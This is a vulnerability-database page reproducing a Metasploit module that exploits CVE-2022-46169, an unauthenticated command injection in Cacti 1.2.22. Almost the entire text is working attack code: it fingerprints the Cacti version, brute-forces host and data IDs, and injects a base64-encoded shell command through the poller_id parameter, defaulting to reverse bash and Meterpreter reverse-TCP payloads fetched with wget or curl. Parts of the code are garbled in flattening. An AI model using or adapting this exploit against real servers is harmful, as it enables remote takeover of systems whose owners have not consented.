Cacti 1.2.22 Command Injection

Credit: mr_me
Risk: High
Local: No
Remote: Yes

## # This module requires Metasploit: # Current source: ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Cacti 1.2.22 unauthenticated command injection', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in order to achieve unauthenticated remote code execution as the www-data user. The module first attempts to obtain the Cacti version to see if the target is affected. If LOCAL_DATA_ID and/or HOST_ID are not set, the module will try to bruteforce the missing value(s). If a valid combination is found, the module will use these to attempt exploitation. If LOCAL_DATA_ID and/or HOST_ID are both set, the module will immediately attempt exploitation. During exploitation, the module sends a GET request to /remote_agent.php with the action parameter set to polldata and the X-Forwarded-For header set to the provided value for X_FORWARDED_FOR_IP (by default In addition, the poller_id parameter is set to the payload and the host_id and local_data_id parameters are set to the bruteforced or provided values. If X_FORWARDED_FOR_IP is set to an address that is resolvable to a hostname in the poller table, and the local_data_id and host_id values are vulnerable, the payload set for poller_id will be executed by the target. This module has been successfully tested against Cacti version 1.2.22 running on Ubuntu 21.10 (vulhub docker image) }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Schiller', # discovery (independent of Steven Seeley) 'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller) 'Owen Gong', # @phithon_xg - vulhub PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2022-46169'], ['URL', ''], # disclosure and technical details ['URL', ''], # vulhub vulnerable docker image and PoC ['URL', ''] # analysis by Stefan Schiller ], 'DefaultOptions' => { 'RPORT' => 8080 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'Type' => :unix_memory } ], [ 'Automatic (Linux Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ] ], 'Privileged' => false, 'DisclosureDate' => '2022-12-05', 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options(['TARGETURI', [true, 'The base path to Cacti', '/']),'X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '']),'HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),'LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.']) ]) register_advanced_options(['MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),'MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),'MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),'MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100]) ]) end def check # sanity check to see if the target is likely Cacti res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('<title>Login to Cacti') return CheckCode::Safe('Target is not a Cacti application.') end # get the version version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first if version.blank? return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.') end begin if <='1.2.22') return CheckCode::Appears("The target is Cacti version #{version}") else return CheckCode::Safe("The target is Cacti version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}") end end def exploitable_rrd_names [ 'apache_total_kbytes', 'apache_total_hits', 'apache_total_hits', 'apache_total_kbytes', 'apache_cpuload', 'boost_avg_size', 'boost_peak_memory', 'boost_records', 'boost_table', 'ExportDuration', 'ExportGraphs', 'syslogRuntime', 'tholdRuntime', 'polling_time', 'uptime', ] end def brute_force_ids # perform a sanity check first if @host_id host_ids = [@host_id] else if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID'] fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible') end host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a end if @local_data_id local_data_ids = [@local_data_ids] else if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID'] fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible') end local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a end # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id max_attempts = host_ids.length * local_data_ids.length if max_attempts > 1000 fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.') end potential_targets = [] request_ct = 0 print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations") host_ids.each do |h_id| print_status("Enumerating local_data_id values for host_id #{h_id}") local_data_ids.each do |ld_id| request_ct += 1 print_status("Performing request #{request_ct}...") if request_ct % 25 == 0 res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000))) unless res print_error('No response received. Aborting bruteforce') return nil end unless res.code == 200 print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce") return nil end begin parsed_response = JSON.parse(res.body) rescue JSON::ParserError print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce") return nil end unless parsed_response.is_a?(Array) print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce") return nil end # the array can be empty, which is not an error but just means the local_data_id is not exploitable next if parsed_response.empty? first_item = parsed_response.first unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) } print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce") return nil end # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it # in addition, some data source types have an empty rrd_name but are still exploitable # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options rrd_name = first_item['rrd_name'] if rrd_name.empty? potential_targets << [h_id, ld_id] elsif exploitable_rrd_names.include?(rrd_name) print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}") return [h_id, ld_id] else next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on end end end return nil if potential_targets.empty? # inform the user about potential targets print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:") potential_targets.each do |h_id, ld_id| print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}") end print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options') nil end def execute_command(cmd, _opts = {}) # use base64 encoding to get around special char limitations cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`" send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0) end def exploit @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present? @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present? unless @host_id && @local_data_id brute_force_result = brute_force_ids unless brute_force_result fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.') end @host_id, @local_data_id = brute_force_result end if target.arch.first == ARCH_CMD print_status('Executing the payload. This may take a few seconds...') execute_command(payload.encoded) else execute_cmdstager(background: true) end end def remote_agent_request(ld_id, h_id, poller_id) { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'remote_agent.php'), 'headers' => { 'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP'] }, 'vars_get' => { 'action' => 'polldata', 'local_data_ids[0]' => ld_id, 'host_id' => h_id, 'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload } } end end

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top